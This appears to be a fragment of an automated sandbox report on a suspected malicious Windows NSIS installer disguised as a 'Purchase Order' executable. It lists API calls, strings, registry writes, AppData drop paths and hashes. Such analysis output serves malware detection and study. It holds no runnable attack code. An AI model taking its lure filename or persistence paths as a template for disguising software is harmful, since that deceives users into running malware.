                                            • Instruction Fuzzy Hash: 29C1D171600300ABDB216F61ED89E2B3AB8FB95746F04053EF641B51F0CB799982DB6D

                                            APIs
                                              • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,?,?,00403401,0000000A), ref: 004066A6
                                              • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                            • GetUserDefaultUILanguage.KERNELBASE(00000002,C:\Users\user~1\AppData\Local\Temp\,771B3420,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",00000000), ref: 004039C4
                                              • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                            • lstrcatW.KERNEL32(1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user~1\AppData\Local\Temp\,771B3420,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",00000000), ref: 00403A2B
                                            • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user~1\AppData\Local\Temp\), ref: 00403AAB
                                            • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 00403ABE
                                            • GetFileAttributesW.KERNEL32(Call), ref: 00403AC9
                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps), ref: 00403B12
                                            • RegisterClassW.USER32(00433E80), ref: 00403B4F
                                            • SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403B67
                                            • CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B9C
                                            • ShowWindow.USER32(00000005,00000000), ref: 00403BD2
                                            • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403BFE
                                            • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403C0B
                                            • RegisterClassW.USER32(00433E80), ref: 00403C14
                                            • DialogBoxParamW.USER32(?,00000000,00403D58,00000000), ref: 00403C33
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb

                                            Control-flow Graph

                                            • Graph rendering not recoverable; first node 439 covers 402edd-402f2b.
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00402EEE
                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,?,?,00000006,?,0000000A), ref: 00402F0A
                                              • Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00405DB4
                                              • Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,?,0000000A), ref: 00405DD6
                                            • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00402F56
                                            Strings
                                            • Inst, xrefs: 00402FC2
                                            • C:\Users\user\Desktop, xrefs: 00402F38, 00402F3D, 00402F43
                                            • "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe", xrefs: 00402EDD
                                            • C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe, xrefs: 00402EF4, 00402F03, 00402F17, 00402F37
                                            • soft, xrefs: 00402FCB
                                            • Error launching installer, xrefs: 00402F2D
                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004030B5
                                            • Null, xrefs: 00402FD4
                                            • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00402EE7
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                            • String ID: "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft

                                            Control-flow Graph

                                            • Graph rendering not recoverable; first node 506 covers 4062dc-4062e7.
                                            APIs
                                            • GetSystemDirectoryW.KERNEL32(Call,?), ref: 0040641D
                                            • GetWindowsDirectoryW.KERNEL32(Call,?,00000000,0042C228,?,00405359,0042C228,00000000), ref: 00406430
                                            • SHGetSpecialFolderLocation.SHELL32(00405359,0041D800,00000000,0042C228,?,00405359,0042C228,00000000), ref: 0040646C
                                            • SHGetPathFromIDListW.SHELL32(0041D800,Call), ref: 0040647A
                                            • CoTaskMemFree.OLE32(0041D800), ref: 00406485
                                            • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004064AB
                                            • lstrlenW.KERNEL32(Call,00000000,0042C228,?,00405359,0042C228,00000000), ref: 00406503
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                            • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch

                                            Control-flow Graph

                                            • Graph rendering not recoverable; first node 633 covers 40176f-401794.
                                            APIs
                                            • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes,?,?,00000031), ref: 004017B0
                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes,?,?,00000031), ref: 004017D5
                                              • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,?,00403460,00433EE0,NSIS Error,?,00000006,?,0000000A), ref: 004062C7
                                              • Part of subcall function 00405322: lstrlenW.KERNEL32(0042C228,00000000,0041D800,771B23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                              • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,0042C228,00000000,0041D800,771B23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                              • Part of subcall function 00405322: lstrcatW.KERNEL32(0042C228,0040327A,0040327A,0042C228,00000000,0041D800,771B23A0), ref: 0040537D
                                              • Part of subcall function 00405322: SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                              • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                              • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                              • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                            • String ID: C:\Users\user~1\AppData\Local\Temp\nsk59ED.tmp$C:\Users\user~1\AppData\Local\Temp\nsk59ED.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes$Call

                                            Control-flow Graph

                                            • Graph rendering not recoverable; first node 699 covers 403116-40312d.
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: CountTick$wsprintf
                                            • String ID: ... %d%%$@

                                            Control-flow Graph

                                            • Graph rendering not recoverable; first node 808 covers 406624-406644.
                                            APIs
                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
                                            • wsprintfW.USER32 ref: 00406676
                                            • LoadLibraryExW.KERNEL32(?,00000000,?), ref: 0040668A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                            • String ID: %s%S.dll$UXTHEME$\
                                            • API String ID: 2200240437-1946221925

                                            Control-flow Graph (first block at 4057f1)
                                            APIs
                                            • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405834
                                            • GetLastError.KERNEL32 ref: 00405848
                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040585D
                                            • GetLastError.KERNEL32 ref: 00405867
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                            • String ID: C:\Users\user\Desktop
                                            • API String ID: 3449924974-3976562730

                                            Control-flow Graph (first block at 405ddf)
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00405DFD
                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",0040338D,1033,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035D9), ref: 00405E18
                                            Strings
                                            • "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe", xrefs: 00405DDF
                                            • nsa, xrefs: 00405DEC
                                            • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405DE4, 00405DE8
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: CountFileNameTempTick
                                            • String ID: "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"$C:\Users\user~1\AppData\Local\Temp\$nsa
                                            • API String ID: 1716503409-1382589664

                                            Control-flow Graph (first block at 73cf177b)
                                            APIs
                                              • Part of subcall function 73CF1B63: GlobalFree.KERNEL32(?), ref: 73CF1DB6
                                              • Part of subcall function 73CF1B63: GlobalFree.KERNEL32(?), ref: 73CF1DBB
                                              • Part of subcall function 73CF1B63: GlobalFree.KERNEL32(?), ref: 73CF1DC0
                                            • GlobalFree.KERNEL32(00000000), ref: 73CF1829
                                            • FreeLibrary.KERNEL32(?), ref: 73CF18AF
                                            • GlobalFree.KERNEL32(00000000), ref: 73CF18D4
                                              • Part of subcall function 73CF2356: GlobalAlloc.KERNEL32(?,?), ref: 73CF2387
                                              • Part of subcall function 73CF2728: GlobalAlloc.KERNEL32(?,00000000,?,?,00000000,?,?,?,73CF17FA,00000000), ref: 73CF27F8
                                              • Part of subcall function 73CF15C6: lstrcpyW.KERNEL32(?,73CF4020,00001018,73CF1854,00000000,?), ref: 73CF15DC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1958308022.0000000073CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 73CF0000, based on PE: true
                                            Similarity
                                            • API ID: Global$Free$Alloc$Librarylstrcpy
                                            • String ID:
                                            • API String ID: 1791698881-3916222277

                                            Control-flow Graph (first block at 4023e4)
                                            APIs
                                            • lstrlenW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsk59ED.tmp,00000023,00000011,00000002), ref: 0040242F
                                            • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\nsk59ED.tmp,00000000,00000011,00000002), ref: 0040246F
                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsk59ED.tmp,00000000,00000011,00000002), ref: 00402557
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: CloseValuelstrlen
                                            • String ID: C:\Users\user~1\AppData\Local\Temp\nsk59ED.tmp
                                            • API String ID: 2655323295-3807621495
                                            APIs
                                              • Part of subcall function 00405C3A: CharNextW.USER32(?,?,0042FA50,?,00405CAE,0042FA50,0042FA50,?,?,771B3420,004059EC,?,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000), ref: 00405C48
                                              • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C4D
                                              • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C65
                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,?,00000000,?), ref: 0040161A
                                              • Part of subcall function 004057F1: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405834
                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes,?,00000000,?), ref: 0040164D
                                            Strings
                                            • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes, xrefs: 00401640
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                            • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes
                                            • API String ID: 1892508949-2950068324
                                            APIs
                                            • IsWindowVisible.USER32(?), ref: 004052C5
                                            • CallWindowProcW.USER32(?,?,?,?), ref: 00405316
                                              • Part of subcall function 0040427D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040428F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: Window$CallMessageProcSendVisible
                                            • String ID:
                                            • API String ID: 3748168415-3916222277
                                            APIs
                                            • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,0042C228,00000000,?,?,Call,?,?,004063FC,80000002), ref: 004061CE
                                            • RegCloseKey.KERNELBASE(?,?,004063FC,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,0042C228), ref: 004061D9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: CloseQueryValue
                                            • String ID: Call
                                            • API String ID: 3356406503-1824292864
                                            APIs
                                            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 004058CC
                                            • CloseHandle.KERNEL32(?), ref: 004058D9
                                            Strings
                                            • Error launching installer, xrefs: 004058B6
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: CloseCreateHandleProcess
                                            • String ID: Error launching installer
                                            • API String ID: 3712363035-66219284
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000,00000001,?), ref: 0040205D
                                              • Part of subcall function 00405322: lstrlenW.KERNEL32(0042C228,00000000,0041D800,771B23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                              • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,0042C228,00000000,0041D800,771B23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                              • Part of subcall function 00405322: lstrcatW.KERNEL32(0042C228,0040327A,0040327A,0042C228,00000000,0041D800,771B23A0), ref: 0040537D
                                              • Part of subcall function 00405322: SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                              • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                              • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                              • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                            • LoadLibraryExW.KERNEL32(00000000,?,?,00000001,?), ref: 0040206E
                                            • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,?,00000001,?), ref: 004020EB
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                            • String ID:
                                            • API String ID: 334405425-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1958308022.0000000073CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 73CF0000, based on PE: true
                                            • Associated: 00000005.00000002.1958280098.0000000073CF0000.00000002.00000001.01000000.00000005.sdmp
                                            • Associated: 00000005.00000002.1958325836.0000000073CF3000.00000002.00000001.01000000.00000005.sdmp
                                            • Associated: 00000005.00000002.1958346292.0000000073CF5000.00000002.00000001.01000000.00000005.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_73cf0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastRead
                                            • String ID:
                                            • API String ID: 1948546556-0
                                            APIs
                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5
                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsk59ED.tmp,00000000,00000011,00000002), ref: 00402557
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: CloseQueryValue
                                            • String ID:
                                            • API String ID: 3356406503-0
                                            APIs
                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            APIs
                                            • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                            • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: Window$EnableShow
                                            • String ID:
                                            • API String ID: 1136574915-0
                                            APIs
                                            • GetModuleHandleA.KERNEL32(?,?,?,00403401,0000000A), ref: 004066A6
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                              • Part of subcall function 00406624: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
                                              • Part of subcall function 00406624: wsprintfW.USER32 ref: 00406676
                                              • Part of subcall function 00406624: LoadLibraryExW.KERNEL32(?,00000000,?), ref: 0040668A
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                            • String ID:
                                            • API String ID: 2547128583-0
                                            APIs
                                            • GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00405DB4
                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,?,0000000A), ref: 00405DD6
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: File$AttributesCreate
                                            • String ID:
                                            • API String ID: 415043291-0
                                            APIs
                                            • CreateDirectoryW.KERNELBASE(?,00000000,00403382,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035D9,?,00000006,?,0000000A), ref: 00405874
                                            • GetLastError.KERNEL32(?,00000006,?,0000000A), ref: 00405882
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: CreateDirectoryErrorLast
                                            • String ID:
                                            • API String ID: 1375471231-0
                                            APIs
                                            • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                              • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: FilePointerwsprintf
                                            • String ID:
                                            • API String ID: 327478801-0
                                            APIs
                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: PrivateProfileStringWrite
                                            • String ID:
                                            • API String ID: 390214022-0
                                            APIs
                                            • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 0040617E
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            APIs
                                            • SearchPathW.KERNELBASE(?,00000000,?,?,?,?,000000FF), ref: 00401749
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: PathSearch
                                            • String ID:
                                            • API String ID: 2203818243-0
                                            • Opcode ID: c0811cb59a621ebc69ef1af7074a37ada7c896faeab5dbfa84eb6157ad43e3d3
                                            • Instruction ID: 76b1046b3576aa71ae923c826af07df126468053c341a8b382c9c50c66927564
                                            • Opcode Fuzzy Hash: c0811cb59a621ebc69ef1af7074a37ada7c896faeab5dbfa84eb6157ad43e3d3
                                            • Instruction Fuzzy Hash: EFE0DF72700100EAE710DFA4DE48EAA33A8DF40368B30813AF611B60C0E6B4A9419B2D
                                            APIs
                                            • WriteFile.KERNELBASE(00000000,00000000,?,?,00000000,?,?,004032FA,000000FF,00416A00,?,00416A00,?,?,?,00000000), ref: 00405E76
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: FileWrite
                                            • String ID:
                                            • API String ID: 3934441357-0
                                            • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                            • Instruction ID: 8754e0b6f25d564075f0081c534dd79b85a2df0f0bc88b3642164a4a3ec1e455
                                            • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                            • Instruction Fuzzy Hash: FDE0B63221065AAFDF109F95DC00AAB7B6CEB052A0F044437FD59E7150D671EA21DAE4
                                            APIs
                                            • ReadFile.KERNELBASE(00000000,00000000,?,?,00000000,?,?,00403344,00000000,00000000,00403168,?,?,00000000,00000000,00000000), ref: 00405E47
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                            • Instruction ID: bd732019988057c431ec21c3a2c50b1292625b962aa4d7912315599e48db2a91
                                            • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                            • Instruction Fuzzy Hash: A9E08C3220021AABCF20AF54DC00FEB3B6CEB05760F004832FD65E6040E230EA219BE8
                                            APIs
                                            • VirtualProtect.KERNELBASE(73CF405C,?,?,73CF404C), ref: 73CF29B5
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1958308022.0000000073CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 73CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_73cf0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: f59ec2b108597a3a065557cc140b5c986e6c73f7c06a157e0f604f29401ca6bb
                                            • Instruction ID: ba7e7acdc16cf0fe714d39e9334e2737225f41129d74443b023d7b1fd8d3c007
